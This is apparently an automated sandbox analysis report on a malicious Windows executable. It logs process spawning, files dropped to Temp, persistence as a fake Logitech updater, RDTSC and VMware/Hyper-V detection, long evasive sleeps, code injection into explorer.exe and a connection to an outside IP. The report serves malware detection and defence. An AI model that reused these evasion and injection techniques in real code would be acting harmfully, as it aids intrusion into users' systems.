File read: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe "C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe"
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe "C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe"
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: fontsub.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: fontsub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: cmlua.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: fontsub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior

Source: C:\Windows\SysWOW64\more.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static file information: File size 11391336 > 1048576

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5d0a00
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x470e00

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: More than 200 imports for user32.dll

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: sppcomapi.pdb source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
Source:	Binary string: sppcomapi.pdbGCTL source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
Source:	Binary string: wntdll.pdbUGP source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp

PE file contains sections with non-standard names

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	Static PE information: section name: .didata
Source: cnfpnteryde.1.dr	Static PE information: section name: dld
Source: vkqcbyjdfiw.12.dr	Static PE information: section name: dld

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_00789FB1 push ecx; ret

14_2_00789FC4

Drops PE files

Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw			Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\cnfpnteryde			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\cnfpnteryde			Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\more.com	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CNFPNTERYDE
Source: C:\Windows\SysWOW64\more.com	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\VKQCBYJDFIW

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	API/Special instruction interceptor: Address: 75DA7C44
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	API/Special instruction interceptor: Address: 75DA7945
Source: C:\Windows\SysWOW64\more.com	API/Special instruction interceptor: Address: 75DA3B54
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	API/Special instruction interceptor: Address: 75DA7C44
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: B0A317
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	API/Special instruction interceptor: Address: 75DA7945

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	RDTSC instruction interceptor: First address: 75DAF3E1 second address: 75DAF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	RDTSC instruction interceptor: First address: 75DAF3FD second address: 75DAF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F8C64C6CA05h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F8C64C6CA90h 0x00000031 rdtsc
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	RDTSC instruction interceptor: First address: 75DAF3E1 second address: 75DAF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	RDTSC instruction interceptor: First address: 75DAF3FD second address: 75DAF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F8C64C6CA05h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F8C64C6CA90h 0x00000031 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_007D8A00 rdtsc

14_2_007D8A00

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\more.com	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw			Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cnfpnteryde			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe TID: 7312	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe TID: 8124	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1720	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6108	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 764	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1720	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2504	Thread sleep time: -180000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\explorer.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0079ED13 FindFirstFileExW,

14_2_0079ED13

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_007693D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW,

14_2_007693D0

Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior

Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_007D8A00 rdtsc

14_2_007D8A00

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0078A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

14_2_0078A195

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Code function: 0_2_0079A032 mov eax, dword ptr fs:[00000030h]	0_2_0079A032
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007D8A00 mov eax, dword ptr fs:[00000030h]	14_2_007D8A00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0078DB50 mov eax, dword ptr fs:[00000030h]	14_2_0078DB50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00795D42 mov eax, dword ptr fs:[00000030h]	14_2_00795D42

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0078A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0078A195
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0078E87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0078E87C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007898A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_007898A8

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 188.114.97.3 80

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_00767EB0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

14_2_00767EB0

